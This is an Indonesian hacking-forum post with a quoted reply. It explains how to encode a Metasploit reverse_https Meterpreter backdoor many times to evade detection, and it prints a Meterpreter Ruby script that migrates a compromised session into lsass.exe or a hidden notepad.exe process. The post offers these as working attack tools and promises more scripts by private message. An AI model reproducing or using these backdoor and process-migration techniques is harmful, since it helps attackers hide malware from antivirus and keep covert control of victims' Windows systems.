10-21-2012, 08:17 PM
(10-19-2012, 08:33 AM)mahong Wrote: oke langsung aj. di pagi yang sebohay ini saya akan melakukan enkripsi backdoors dengan menggunakan metasploit framework di Backtrack 5!bener nggak bang ?
Pertama, install ni:
" apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils "
jalanin metasploit framework console, gunakan exploit/multi/handler method, dan set payload windows/meterpreter/reverse_https.Ini merupakan langkah untuk menggunakan script ‘launch_and_migrate.rb’, jadi kita bisa pidah ke proses berikutnya setelah kita dapat peluang. Kita encoded backdoornya 1000 kali sampai tidak stabil.
untuk sciptnya bisa PM ke saya dengan mencantumkan email anda..
semoga dapat membantu...
thxs...
Code:
# $Id$
#
# Simple example script that migrates to a specific process by name.
# This is meant as an illustration.
#
spawn = false
target = nil
opts = Rex::Parser::Arguments.new(
"-h" => [ false,"Help menu." ],
"-f" => [ false, "Launch a process and migrate into the new process"]
)
opts.parse(args) { |opt, idx, val|
case opt
when "-f"
spawn = true
when "-h"
print_line("")
print_line("USAGE: run migrate [process name]")
print_line("EXAMPLE: run migrate explorer.exe")
print_line(opts.usage)
raise Rex::Script::Completed
else
target = val
end
}
if client.platform =~ /win32|win64/
server = client.sys.process.open
print_status("Current server process: #{server.name} (#{server.pid})")
target_pid = nil
if ! spawn
# Get the target process name
target ||= "lsass.exe"
print_status("Migrating to #{target}...")
# Get the target process pid
target_pid = client.sys.process[target]
if not target_pid
print_error("Could not access the target process")
print_status("Spawning a notepad.exe host process...")
note = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true })
target_pid = note.pid
end
else
target ||= "notepad.exe"
print_status("Spawning a #{target} host process...")
newproc = client.sys.process.execute(target, nil, {'Hidden' => true })
target_pid = newproc.pid
if not target_pid
print_error("Could not create a process around #{target}")
raise Rex::Script::Completed
end
end
# Do the migration
print_status("Migrating into process ID #{target_pid}")
client.core.migrate(target_pid)
server = client.sys.process.open
print_status("New server process: #{server.name} (#{server.pid})")
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
SENJA INI